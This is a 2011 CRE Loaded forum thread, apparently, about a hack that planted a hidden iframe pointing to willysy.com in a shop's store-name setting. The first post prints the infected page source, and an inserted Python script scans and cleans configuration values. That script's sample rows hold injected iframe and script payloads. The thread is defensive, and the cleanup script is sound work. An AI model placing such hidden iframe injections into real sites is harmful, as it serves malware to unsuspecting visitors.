Loaded Commerce Community


All times are UTC - 5 hours




 Post subject: willysy.com inject to config mystore name
Posted: Mon Jul 25, 2011 12:10 pm
Hi, on 24.07.2011 I found a massive hack of creloaded and oscomm systems.
Configure is probably over by the trade name of the iframe. This is entered directly into the database. The problem is that your business will be evaluated as harmful on the web by google.com and Mozilla, and it will be blocked.

See your source code:
Code:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="LTR" lang="xx">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO_8859-2">
<title>name our eshop<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe></title>
<meta name="Description" content="


Google Analytics evaluates this <iframe src='http://willysy.com/... as a harmful website.
Before Google marks your site, you can clean up this <iframe through configuration/my store/Store name. Once your site has been designated, the only option is to modify it directly via MySQL.

It's only a temporary solution; I do not know how to protect trade against the same attack, please help...
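
A check for the symptom described in the post above, as an added example that is not part of the original thread or CRE Loaded's own code: it scans shop settings for active markup such as the hidden iframe and rewrites flagged values with parameterized updates. The table and column names, the setting keys, and the sample rows are assumptions modeled on an osCommerce-style `configuration` table, and SQLite stands in for MySQL.

```python
import re
import sqlite3

# Assumed osCommerce-style schema: configuration(configuration_key, configuration_value).
# Tags that have no place in a plain-text setting such as a store name.
ACTIVE_TAGS = {"iframe", "script", "object", "embed", "frame"}
# Start of a tag; matches even when the stored value was cut off before ">".
TAG_START = re.compile(r"<\s*/?\s*([a-zA-Z][a-zA-Z0-9]*)")

def active_tags(value):
    """Sorted names of active-content tags that occur in value."""
    return sorted({m.group(1).lower() for m in TAG_START.finditer(value)} & ACTIVE_TAGS)

def scan_configuration(conn):
    """[(key, tags)] for every setting whose value carries active markup."""
    rows = conn.execute("SELECT configuration_key, configuration_value "
                        "FROM configuration ORDER BY configuration_key")
    return [(key, tags) for key, value in rows if (tags := active_tags(value or ""))]

def clean_value(value):
    """Keep only the text before the first active tag (assumes appended markup)."""
    for m in TAG_START.finditer(value):
        if m.group(1).lower() in ACTIVE_TAGS:
            return value[:m.start()].rstrip()
    return value

def repair(conn):
    """Rewrite flagged settings with parameterized UPDATEs; return the keys changed."""
    flagged = [key for key, _ in scan_configuration(conn)]
    for key in flagged:
        (value,) = conn.execute("SELECT configuration_value FROM configuration "
                                "WHERE configuration_key = ?", (key,)).fetchone()
        conn.execute("UPDATE configuration SET configuration_value = ? "
                     "WHERE configuration_key = ?", (clean_value(value), key))
    return flagged

def build_sample_db():
    """In-memory SQLite stand-in for the shop's MySQL database; rows are constructed."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE configuration "
                 "(configuration_key TEXT PRIMARY KEY, configuration_value TEXT)")
    conn.executemany("INSERT INTO configuration VALUES (?, ?)", [
        ("STORE_NAME", "name our eshop<iframe src='http://injected.example/' "
                       "style='position:absolute;visibility:hidden'></iframe>"),
        ("EMAIL_FROM", "Our Shop <shop@shop.example>"),  # angle brackets, not a tag
        ("STORE_NAME_ADDRESS", "Main Street 1<script src='http://injected.exa"),  # truncated
    ])
    return conn
```

Run the scan read-only first and review each flagged value before calling `repair`, since cutting at the first tag is only right when the markup was appended to the legitimate text.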


 
 Post subject: Re: willysy.com inject to config mystore name
Posted: Mon Jul 25, 2011 5:10 pm
Pretty simple - upgrade (you're posting this in the 6.2 forum, a cart that is several years out of date.)
There are a ton of security things you can do to limit this sort of issue, top of the list: upgrade.

Simon

_________________
www.codemehappy.com
For Cre Loaded tips, how-to articles and more


 
 Post subject: Re: willysy.com inject to config mystore name
Posted: Sat Jul 30, 2011 1:59 pm
Not necessarily as simple as that.

This particular modification pretty much requires that the file manager be in place, or the FTP and/or control panel credentials be compromised. Security fixes in any release aren't going to help with that last.

Change your passwords frequently, put a crowbar in the wallet to install an SSL certificate, and delete file manager to help prevent this in future.

David

_________________
My CRE Loaded FAQ List
CRE Loaded Hosting


© CRE Loaded is a product of Chain Reaction Ecommerce, Inc. Usage & Privacy Policy